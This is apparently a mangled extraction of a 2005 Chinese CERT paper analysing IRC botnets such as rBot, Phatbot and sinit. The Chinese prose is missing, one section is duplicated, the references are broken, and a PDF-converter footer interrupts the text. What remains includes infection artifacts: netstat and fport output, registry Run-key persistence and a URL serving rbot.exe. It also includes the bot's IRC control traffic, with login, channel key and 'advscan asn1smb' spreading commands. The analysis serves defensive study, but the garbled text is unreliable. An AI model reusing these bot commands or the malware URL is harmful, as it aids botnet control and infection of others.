UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbot.exe
IP 10001
sniffer
cmd.exe
c:\>netstat -an
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 10.0.0.1:1150 203.151.217.85:6667 ESTABLISHED
TCP 10.0.0.1:1616 202.108.32.137:445 FIN_WAIT_1
TCP 10.0.0.1:1631 202.108.32.147:445 FIN_WAIT_1
TCP 10.0.0.1:1714 202.108.32.190:445 FIN_WAIT_1
TCP 10.0.0.1:1727 202.108.32.165:445 FIN_WAIT_1
TCP 10.0.0.1:2253 202.108.34.211:445 TIME_WAIT
TCP 10.0.0.1:2904 202.108.37.91:445 TIME_WAIT
TCP 10.0.0.1:3476 202.108.39.151:445 TIME_WAIT
TCP 10.0.0.1:3478 202.108.39.153:445 TIME_WAIT
TCP 10.0.0.1:3480 202.108.39.155:445 TIME_WAIT
TCP 10.0.0.1:3486 202.108.39.151:445 TIME_WAIT
TCP 10.0.0.1:3487 202.108.39.153:445 TIME_WAIT
TCP 10.0.0.1:3488 202.108.39.155:445 TIME_WAIT
TCP 10.0.0.1:3673 202.108.40.82:445 TIME_WAIT
TCP 10.0.0.1:3674 202.108.40.82:445 TIME_WAIT
TCP 10.0.0.1:4953 202.108.45.20:445 TIME_WAIT
TCP 10.0.0.1:4955 202.108.45.20:445 TIME_WAIT
TCP 10.0.0.1:4959 202.108.45.23:445 TIME_WAIT
TCP 10.0.0.1:4961 202.108.45.23:445 TIME_WAIT
UDP 0.0.0.0:69 (UDP 69)
UDP 0.0.0.0:445
UDP 10.0.0.1:137
UDP 10.0.0.1:138
fport.exe
C:\>fport | find "1150" (local port 1150, remote port 6667)
1048 wininit -> 1150 TCP C:\WINNT\system32\wininit.exe
C:\>fport | find "69"
1048 wininit -> 69 UDP C:\WINNT\system32\wininit.exe
6667 69 wininit.exe rBot
wininit.exe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLM\Software\Microsoft\Windows\CurrentVersion\Run "Microsoft Update 32" = wininit.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices "Microsoft Update 32" = wininit.exe
Wininit 445 6667
IP
203.151.217.85 6667
TCP
Wininit IRC
-> NICK CHN|9148119\r\nUSER autdeoxsnv 0 0 :CHN|9148119\r\n
-> JOIN #xdcc dropit\r\n (join channel xdcc with key dropit)
<- :CHN|9148119!autdeoxsnv@10.0.0.1 332 CHN|9148119 #xdcc :advscan asn1smb 100 5 0 b (advscan asn1smb)
-> PRIVMSG #xdcc :[SCAN] Sequential Port Scan Started On 10.0.0.0:445 within a delay of 5 seconds for 0 min using 100 threads\r\n